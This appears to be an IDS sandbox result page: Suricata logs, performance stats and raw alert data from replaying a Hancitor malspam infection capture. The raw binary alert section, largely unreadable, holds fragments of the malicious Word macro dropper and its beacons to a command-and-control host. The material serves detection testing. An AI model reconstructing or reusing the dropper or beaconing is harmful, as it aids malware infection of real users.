{"timestamp":"2018-09-04T15:50:23.572559+0000","flow_id":1133195609176561,"pcap_cnt":604,"event_type":"http","src_ip":"10.9.4.102","src_port":49179,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"thenlorefuse.com","url":"\/d2\/about.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html"}}
{"timestamp":"2018-09-04T15:50:23.572559+0000","flow_id":1133195609176561,"pcap_cnt":604,"event_type":"fileinfo","src_ip":"185.66.9.184","src_port":80,"dest_ip":"10.9.4.102","dest_port":49179,"proto":"TCP","http":{"hostname":"thenlorefuse.com","url":"\/d2\/about.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html","http_me

This file has been truncated. Go here to download in full.


keyword_perf.log - (13990 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 2/22/2019 -- 09:56:41
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             9696303         3014            3014            146336          3217.00         3217.00         0.00           
  content          73623870        18585           7038            406200          3961.00         3779.00         4072.00        
  pcre             13898278        4039            2740            71755           3441.00         3383.00         3562.00        
  byte_test        976411          277             210             37670           3524.00         3738.00         2856.00        
  byte_jump        490145          135             3               33366           3630.00         3487.00         3633.00        
  isdataat         33705           12              0               2879            2808.00         0.00            2808.00        
  flowbits         1008506         356             44              5857            2832.00         3236.00         2776.00        
  urilen           1175674         386             64              24339           3045.00         3024.00         3049.00        
  byte_extract     8297            2               2               4627            4148.00         4148.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             9696303         3014            3014            146336          3217.00         3217.00         0.00           
  flowbits         972951          349             37              4914            2787.00         2887.00         2776.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          59226167        14904           4952            406200          3973.00         3692.00         4113.00        
  pcre             11349371        3413            2430            71755           3325.00         3254.00         3499.00        
  byte_test        976411          277             210             37670           3524.00         3738.00         2856.00        
  byte_jump        490145          135             3               33366           3630.00         3487.00         3633.00        
  isdataat         33705           12              0               2879            2808.00         0.00            2808.00        
  byte_extract     8297            2               2               4627            4148.00         4148.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         35555           7               7               5857            5079.00         5079.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3077906         934             673             24567           3295.00         3371.00         3099.00        
  pcre             1716748         438             244             30974           3919.00         4008.00         3807.00        
  urilen           1175674         386             64              24339           3045.00         3024.00         3049.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          790729          242             0               10422           3267.00         0.00            3267.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          191720          66              0               3581            2904.00         0.00            2904.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3435715         455             23              147525          7551.00         50536.00        5262.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3171775         875             546             42393           3624.00         3762.00         3396.00        
  pcre             636781          129             66              19161           4936.00         5804.00         4027.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1346286         390             259             31456           3452.00         3424.00         3506.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_accept
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  pcre             195378          59              0               4217            3311.00         0.00            3311.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          198822          59              59              15207           3369.00         3369.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_protocol
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          7362            2               2               3776            3681.00         3681.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1788498         554             491             16975           3228.00         3229.00         3223.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          370442          99              28              27653           3741.00         4582.00         3410.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3991            1               1               3991            3991.00         3991.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          14457           4               4               4056            3614.00         3614.00         0.00           


unified2.alert.1550829399 - (6884 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
4[Ž©!šÑý_Õë•
	fPÀ
N[Ž©![Ž©!š2E$[û_Õë•
	fPÀ
PöÃScree€n, Coun Ð7
 S*`- Right_Ch€aracterb24
cTypeBackspace„Copy
@
End Ö

ð„ÔÀÿÿÿÿ%ÆÊ·ÿÿ¶ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿxÿÿMEÿÿÿÿÿÿÿÿÿÿßÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ(<ÿÿ<<ÿÿ<ÿÿÿÿÿÿ"XÓ"\
ÿÿÿÿ8,pÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ„@„Œÿÿÿÿÿÿÿÿÿÿ`„¦ÿÿÿÿÿÿÿÿ	ÿÿ+Rÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ°èÿÿÿÿ„iƒTÿÿÿÿÿÿÿÿÿÿÿÿÿÿ„€?Ð „Vÿÿÿÿÿÿÿÿø% „Zÿÿÿÿÿÿÿÿ(%ÿÿÿÿÈÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿpÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿßþÊ%€	ÿÿÿÿ"€	ÿÿÿÿ€(
@€	ÿÿÿÿ€P*X€	ÿÿÿÿ€	ÿÿÿÿ.ˆ2¸N[Ž©![Ž©!š2E$[û_Õë•
	fPÀ
P€ÃðBø€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ€€€	ÿÿÿÿ€	ÿÿÿÿ
 8P`€	ÿÿÿÿpx€	ÿÿÿÿ€	ÿÿÿÿ€	ÿÿÿÿ€€	ÿÿÿÿ€	ÿÿÿÿÿÿÿÿ–]ò@¶.p¶if'Œ¶Temp$’A@: 6B@ ]òXí¶scripting.filesystemobject$ˆ.¦òx¶5C ŒѪ¶6.e¶xeѬ ¦B@¨v¶5C ŒѪ¶6 ®!°!dѬ ¦B@¨ˆ.oÿÿ–p]òð]òíÆ.Ví¶b64 V%^.Z¶
bin.base64 Z(` T Z(d Z!b'Rí°.Zí°.Viÿÿxÿÿÿÿpÿÿÿÿ²Attribute VB_Name = "Module4"


Sub sdf	()<Dim @kk
kk¤.p" & "ifVChDir Environ(" Temp"dSelection.TypeBack space–   œFSO As0 Obj(qet = Create("scripting.filesyste<mo3fO5.copy Source:="5C£kk, Des?aŒ6.e¼xe^,UserForm1.T@extBox
 
End ›
Priv` FuFn‚€@cod€se64(ByVal strDatŠa€SÅng)ÐByteƒ· ”‚”‘wXMLMS2.DOMDoc€ument
§m…N3IElle‡…+S€[Ä=à New •
‚d= ƒ.c‚h(ð"b64cA"
.d@7A~‹binø.baA?€\		AP»C„2eKÀÅn€6õÁd@Ou€‘(ðNoth‹Š€A@?FÀAAÁk…hÁ

J[Ž©![Ž©!š
.E
 Vÿ_Õë•
	fPÀ
PŒ®ð@ÔLÿÿÿÿG›Æ„ÿÿˆ¶ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿxÿÿMEÿÿÿÿÿÿÿÿÿÿßÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ‚ƒ„…þÿÿÿ‡ˆ‰Š‹ŒŽ‘’“”•–—˜þÿÿÿš›œžŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈþÿÿÿÊËÌÍÎÏÐÑÒÓÔþÿÿÿÖ×ØþÿÿÿÚþÿÿÿþÿÿÿÝþÿÿÿßàáâþÿÿÿäþÿÿÿþÿÿÿçþÿÿÿéêëìþÿÿÿîþÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ(S<ÿÿÿÿS<ÿÿÿÿSÿÿÿÿSÿÿÿÿÿÿš0{98364C7C-1C43-4B8C-B38E-16088EE523EE}{A6910E86-9090-42A7-B37F-F6DD97A1F358}ÿÿÿÿh€þÿ0ÿÿ(ÿÿÿÿÿÿÿÿÿÿ%þÿÿÿÿÿÿÿÿÿXÿÿ0ÿÿÿÿÿÿÿÿ%ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ0ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿßþÊÿÿÿÿÿÿÿÿxÿÿÿÿâ°Attribute VB_Name = "UserForm1"
"

€Bas€0{98364C7C-1C43-4B8C-B38E-16088EE523EE}{A6910E86-9090-42A7J7F-F6DD97A1F358}
dGlobal!‹SpacoFalseŠCreatablPre declaIdÔTru
BExpose0TemplateDeriv–Customiz‹Dð@ÔLÿÿÿÿG›Ɠ®ÿÿˆ¶ÿÿÿÿÿÿÿÿÿÿÿÿUserForm3ÿÿÿÿÿÿÿÿÿÿÿÿ†ˆThisDocumentÿÿÿÿ™Ï_VBA_PROJECTÿÿÿÿÿÿÿÿÿÿÿÿy PROJECTÿÿÿÿÉìÿÿÿÿÿÿÿÿÿÿÿÿxÿÿMEÿÿÿÿÿÿÿÿÿÿßÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ4[Ž©´)FÚm!
	f6ó³‰ÀPö[Ž©´[Ž©´)FÚEÌÁA
	f6ó³‰ÀPP¡(GET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: api.ipify.org
Cache-Control: no-cache

4[Ž©½	=s¼Ë
	f¹B	¸ÀPû[Ž©½[Ž©½	=sßEÑç¾
	f¹B	¸ÀPPûPOST /mlu/forum.php HTTP/1.0
Host: thenlorefuse.com
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 207
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

4[Ž©¾#è¼Ë
	f¹B	¸ÀPí[Ž©¾[Ž©¾#èÑEÃçÌ
	f¹B	¸ÀPPQÝPOST /d2/about.php HTTP/1.0
Host: thenlorefuse.com
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 236
Content-Type: application/octet-stream
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Encoding: binary


IDSDeathBlossom.py.log - (1188 bytes) - download
1
2
3
4
5
6
7
8
2019-02-22 09:56:31,662 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-02-22 09:56:32,371 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-02-22 09:56:32,371 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etopen-all
2019-02-22 09:56:32,372 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-02-22 09:56:32,372 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-02-22 09:56:32,372 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etopen/suricata400-etopen-all.yaml -l /var/www/html/90a60290858e08e0e9d5f7a4d55e5dabd2a6d3ad9c956d904083161fa55f2f7a -r /var/pcap/01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap -vvv -k none
2019-02-22 09:56:41,118 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-02-22 09:56:41,118 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 9.46695995331